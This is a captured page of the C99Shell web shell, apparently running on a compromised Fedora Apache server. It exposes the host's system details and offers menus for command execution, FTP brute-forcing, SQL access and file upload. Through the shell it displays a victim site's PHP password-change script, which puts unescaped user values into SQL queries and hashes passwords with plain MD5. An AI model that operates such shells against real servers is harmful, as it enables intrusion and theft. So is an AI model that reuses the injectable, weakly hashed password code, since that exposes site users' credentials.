!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/login/users/Examples/   drwxr-xr-x
Free 2.81 GB of 27.03 GB (10.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     passwd.php (2.02 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?

include "../config.php";
include
"../autorize.php";

$Logat   = E_Logat();

if (!
E_Logat() )
{ die (
$err_query);}

$ok=0;
$index=-1;
$Cine = UserName();

$l_eroare    =  array("Current password is incorect","The new passwords do not match");
$l_succes   =  "Password was succesfully changed";

if (isset(
$Schimba))
{
  if ( (
$pass1<>'') and ($pass1==$pass2) )
   {
     
$parola=md5($pass);

     
$sql_txt="select user from users where user='$Cine' and password='$parola'";
     
$sql_rez=mysql_query($sql_txt,$db_conect) or die ($err_query);

     if (
mysql_num_rows($sql_rez)<>0 )
      {
       
$pass=md5($pass1);
       
$sql_txt="update users set password='$pass' where user='$Cine'";
       
mysql_query($sql_txt,$db_conect) or die ($err_query);
       
$ok=1;
      }
     else {
$index=0;}
   }
  else {
$index=1;}
}


if (
$ok==1)
{
   echo
"
   <br><br>
   <center>
     $l_succes.<br><br>
   </center>"
;
}
else
{
    echo
"
   <center>
    <BR><BR><B>Change your password</B><BR>
    <HR SIZE=1 width=330>"
;

switch (
$index):
  case -
1:
    break;
  default:
    echo
"<font color=red size=-1>$l_eroare[$index]</font>";
        break;
  endswitch;

    echo
"
     <form method=\"post\" action=\"passwd.php\">
           <table>
             <tr>
               <td><B>Current password:</B></td>
               <td align=left><input type=password name=\"pass\" size=\"15\"></td>
             </tr>
             <tr>
               <td><B>New password:</B></td>
               <td align=left><input type=password name=\"pass1\" size=\"15\"></td>
             </tr>
             <tr>
               <td><B>Again:</B></td>
               <td><input type=password name=\"pass2\" size=\"15\"></td>
             </tr>
             <tr>
               <td colspan=2 align=middle>
                 <input type=\"submit\" name=\"Schimba\" value=\"Modify\">
               </td>
             </tr>
           </table>
          </form>
          <br><br>
   </center>"
;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0033 ]--